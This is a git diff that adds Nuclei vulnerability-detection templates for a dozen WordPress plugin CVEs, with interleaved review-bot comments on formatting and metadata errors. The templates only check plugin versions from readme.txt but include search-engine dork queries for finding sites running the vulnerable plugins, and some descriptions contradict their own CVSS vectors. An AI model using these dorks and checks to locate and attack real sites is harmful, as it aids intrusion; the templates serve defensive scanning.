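Review bot: `name: >` and `description: >` use the folded block scalar with YAML's default clip chomping, so each value ends with a trailing newline (the name becomes `"WP To Do <= 1.3.0 - ... via Task Comments\n"`), which surfaces as a stray blank line wherever the field is printed or compared. `name: >-` and `description: >-` strip that final line break and are otherwise identical in effect. Every template in this commit uses the clip form, so the change belongs in the generator rather than in this file alone.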
--- /dev/null
+++ b/poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39638-69edc4c284df671b2ba465627be06431
+
+info:
+ name: >
+ Registrations for the Events Calendar – Event Registration Plugin <= 2.12.2 - Authenticated (Contributor+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Registrations for the Events Calendar – Event Registration Plugin plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.12.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/26e35c4a-79ec-4742-8004-1c799d2c56ff?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2024-39638
+ metadata:
+ fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/"
+ google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/"
+ shodan-query: 'vuln:CVE-2024-39638'
+ tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "registrations-for-the-events-calendar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.12.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml b/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml
new file mode 100644
index 0000000000..9539109316
--- /dev/null
+++ b/poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43915-77573ddf79e044c9a0d67924130e634b
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.102 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Zephyr Project Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.3.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/33bf39f8-6f56-4089-bb46-5d401af72953?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
+ cvss-score: 5.5
+ cve-id: CVE-2024-43915
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:CVE-2024-43915'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.102')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml b/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml
new file mode 100644
index 0000000000..24b039fb47
--- /dev/null
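Review bot: The description says the reflected XSS is reachable by "unauthenticated attackers", but the `cvss-metrics` line carries `PR:L` (low privileges required) and the 5.5 score reflects that, so the text and the vector disagree and a reader cannot tell which is right. Check the referenced advisory and align the prose with the vector, or the vector with the prose. Separately, every file in this commit ends with `\ No newline at end of file`; terminating each template with a newline avoids the warning some YAML linters and diff tools raise for that.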
+++ b/poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.102 - Missing Authorization to Authenticated (Subscriber+) Status Updates
+ author: topscoder
+ severity: low
+ description: >
+ The Zephyr Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the via the 'create_status‘, ‘update_status‘, and ‘delete_status‘ functions in all versions up to, and including, 3.3.102. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update statuses.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6746d20c-d528-4c69-95e4-9f22d6460463?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43916
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:CVE-2024-43916'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.102')
\ No newline at end of file
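Review bot: The description contains a doubled phrase, "a missing capability check on the via the", and wraps the function names in a mix of an ASCII apostrophe and typographic single quotes (`'create_status‘, ‘update_status‘, and ‘delete_status‘`), so the names do not copy-paste cleanly into a search. Suggested wording for that sentence: `... due to a missing capability check on the 'create_status', 'update_status', and 'delete_status' functions in all versions up to, and including, 3.3.102.`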
diff --git a/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml b/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml
new file mode 100644
index 0000000000..f664f07978
--- /dev/null
+++ b/poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949
+
+info:
+ name: >
+ TI WooCommerce Wishlist <= 2.8.2 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The TI WooCommerce Wishlist plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c8456fa-939c-4ceb-8361-a8758aec7708?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43917
+ metadata:
+ fofa-query: "wp-content/plugins/ti-woocommerce-wishlist/"
+ google-query: inurl:"/wp-content/plugins/ti-woocommerce-wishlist/"
+ shodan-query: 'vuln:CVE-2024-43917'
+ tags: cve,wordpress,wp-plugin,ti-woocommerce-wishlist,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ti-woocommerce-wishlist/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ti-woocommerce-wishlist"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml b/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml
new file mode 100644
index 0000000000..1ef14a845c
--- /dev/null
+++ b/poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97
+
+info:
+ name: >
+ WBW Product Table Pro <= 1.9.4 - Unauthenticated Arbitrary SQL Execution
+ author: topscoder
+ severity: critical
+ description: >
+ The WBW Product Table Pro plugin for WordPress is vulnerable to unauthorized arbitrary SQL Execution due to a missing capability check on a function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to execute arbitrary SQL queries that can be used to steal sensitive data or gain elevated access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac167257-c34e-45a2-8647-ed5cdb8dd64d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2024-43918
+ metadata:
+ fofa-query: "wp-content/plugins/woo-producttables-pro/"
+ google-query: inurl:"/wp-content/plugins/woo-producttables-pro/"
+ shodan-query: 'vuln:CVE-2024-43918'
+ tags: cve,wordpress,wp-plugin,woo-producttables-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-producttables-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-producttables-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.4')
\ No newline at end of file
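Review bot: `cvss-score: 10` is the only score in this commit written without a decimal; every other template uses a float literal (`9.8`, `5.3`, `4.4`), so a consumer that types the field will see an integer here and floats everywhere else. `cvss-score: 10.0` keeps the field uniformly typed and matches how the other files are generated.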
diff --git a/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml b/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml
new file mode 100644
index 0000000000..befa2978d8
--- /dev/null
+++ b/poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e
+
+info:
+ name: >
+ WP Testimonial Widget <= 3.1 - Authenticated (Admin+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The WP Testimonial Widget plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/072b66dd-a5d3-46b5-92ec-9cc83b8ea8ef?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-43966
+ metadata:
+ fofa-query: "wp-content/plugins/wp-testimonial-widget/"
+ google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/"
+ shodan-query: 'vuln:CVE-2024-43966'
+ tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-testimonial-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml b/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml
new file mode 100644
index 0000000000..71c08b14c2
--- /dev/null
+++ b/poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254
+
+info:
+ name: >
+ WP Testimonial Widget <= 3.1 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Testimonial Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b11ccbbd-c909-4160-af36-8f0b50fb1285?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-43967
+ metadata:
+ fofa-query: "wp-content/plugins/wp-testimonial-widget/"
+ google-query: inurl:"/wp-content/plugins/wp-testimonial-widget/"
+ shodan-query: 'vuln:CVE-2024-43967'
+ tags: cve,wordpress,wp-plugin,wp-testimonial-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-testimonial-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-testimonial-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml b/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml
new file mode 100644
index 0000000000..8d0507662b
--- /dev/null
+++ b/poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5857-3d292977eef774943a0aa421905b95f9
+
+info:
+ name: >
+ Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free <= 3.7.3.2 - Missing Authorization to Unauthenticated Arbitrary Media Deletion
+ author: topscoder
+ severity: high
+ description: >
+ The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the af2_handel_file_remove AJAX action in all versions up to, and including, 3.7.3.2. This makes it possible for unauthenticated attackers to delete arbitrary media files.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cd0e015-abf2-4905-8b42-46b685be2c74?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
+ cvss-score: 5.3
+ cve-id: CVE-2024-5857
+ metadata:
+ fofa-query: "wp-content/plugins/funnelforms-free/"
+ google-query: inurl:"/wp-content/plugins/funnelforms-free/"
+ shodan-query: 'vuln:CVE-2024-5857'
+ tags: cve,wordpress,wp-plugin,funnelforms-free,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "funnelforms-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml b/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml
new file mode 100644
index 0000000000..a8ffb03e3e
--- /dev/null
+++ b/poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530
+
+info:
+ name: >
+ WP Accessibility Helper <= 0.6.2.8 - Missing Authorization to Authenticated (Subscriber+) Limited Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The WP Accessibility Helper (WAH) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_contrast_variations' and 'save_empty_contrast_variations' functions in all versions up to, and including, 0.6.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit or delete contrast settings. Please note these issues were patched in 0.6.2.8, though it broke functionality and the vendor has not responded to our follow-ups.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3beee75-0480-4504-a177-45f8cd32cf36?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
+ cvss-score: 5.4
+ cve-id: CVE-2024-5987
+ metadata:
+ fofa-query: "wp-content/plugins/wp-accessibility-helper/"
+ google-query: inurl:"/wp-content/plugins/wp-accessibility-helper/"
+ shodan-query: 'vuln:CVE-2024-5987'
+ tags: cve,wordpress,wp-plugin,wp-accessibility-helper,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-accessibility-helper/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-accessibility-helper"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.6.2.8')
\ No newline at end of file
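Review bot: The DSL matcher flags 0.6.2.8 as affected (`compare_versions(version, '<= 0.6.2.8')`), yet the description's last sentence says the issues were patched in 0.6.2.8; the two cannot both be right. If 0.6.2.8 is the fixed release the check should be `compare_versions(version, '< 0.6.2.8')` with the name and description bound adjusted to `<= 0.6.2.7`, otherwise the "patched in 0.6.2.8" sentence should go — confirm against the Wordfence entry before changing either.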
diff --git a/poc/cve/CVE-2024-6311.yaml b/poc/cve/CVE-2024-6311.yaml
new file mode 100644
index 0000000000..bcbf12a4b9
--- /dev/null
+++ b/poc/cve/CVE-2024-6311.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6311
+
+info:
+ name: >
+ Funnelforms Free <= 3.7.3.2 - Authenticated (Administrator+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'af2_add_font' function in all versions up to, and including, 3.7.3.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbd42fc4-ab4a-4053-b765-18272eacd2bc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-6311
+ metadata:
+ fofa-query: "wp-content/plugins/funnelforms-free/"
+ google-query: inurl:"/wp-content/plugins/funnelforms-free/"
+ shodan-query: 'vuln:CVE-2024-6311'
+ tags: cve,wordpress,wp-plugin,funnelforms-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "funnelforms-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6312.yaml b/poc/cve/CVE-2024-6312.yaml
new file mode 100644
index 0000000000..c989b2847b
--- /dev/null
+++ b/poc/cve/CVE-2024-6312.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6312
+
+info:
+ name: >
+ Funnelforms Free <= 3.7.3.2 - Authenticated (Administrator+) Arbitrary File Deletion
+ author: topscoder
+ severity: low
+ description: >
+ The Funnelforms Free plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 3.7.3.2 via the 'af2DeleteFontFile' function. This is due to the plugin not properly validating a file or its path prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e815531-f966-44a1-a037-8077a40c83b0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 6.5
+ cve-id: CVE-2024-6312
+ metadata:
+ fofa-query: "wp-content/plugins/funnelforms-free/"
+ google-query: inurl:"/wp-content/plugins/funnelforms-free/"
+ shodan-query: 'vuln:CVE-2024-6312'
+ tags: cve,wordpress,wp-plugin,funnelforms-free,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/funnelforms-free/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "funnelforms-free"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7.3.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml b/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml
new file mode 100644
index 0000000000..a5e973a0c6
--- /dev/null
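Review bot: The description says the deletion is reachable "for unauthenticated attackers", while the `name` (Authenticated (Administrator+)) and the `PR:H` component of `cvss-metrics` both require an administrator account; since the name and the vector agree, the description sentence should read `This makes it possible for authenticated attackers, with administrator-level access and above, to delete arbitrary files, including the wp-config.php file, ...`. Nothing in the template exercises the af2DeleteFontFile path, so this metadata is the only place the distinction is recorded and it is what downstream triage will read.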
+++ b/poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3
+
+info:
+ name: >
+ GEO my WordPress <= 4.5.0.1 - Unauthenticated Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The GEO my WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.5.0.1 via the 'form[info_window_template][content_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e65922a-3498-4946-8415-3d922e85e46a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-6330
+ metadata:
+ fofa-query: "wp-content/plugins/geo-my-wp/"
+ google-query: inurl:"/wp-content/plugins/geo-my-wp/"
+ shodan-query: 'vuln:CVE-2024-6330'
+ tags: cve,wordpress,wp-plugin,geo-my-wp,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/geo-my-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "geo-my-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6448.yaml b/poc/cve/CVE-2024-6448.yaml
new file mode 100644
index 0000000000..af07d0eadb
--- /dev/null
+++ b/poc/cve/CVE-2024-6448.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6448
+
+info:
+ name: >
+ Mollie Payments for WooCommerce <= 7.7.0 - Unauthenticated Full Path Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The Mollie Payments for WooCommerce plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 7.7.0. This is due to the error reporting being enabled by default in multiple plugin files. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c98026c-28a9-4c69-9f34-4c3bd4f75d85?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-6448
+ metadata:
+ fofa-query: "wp-content/plugins/mollie-payments-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/mollie-payments-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-6448'
+ tags: cve,wordpress,wp-plugin,mollie-payments-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mollie-payments-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mollie-payments-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.7.0')
\ No newline at end of file
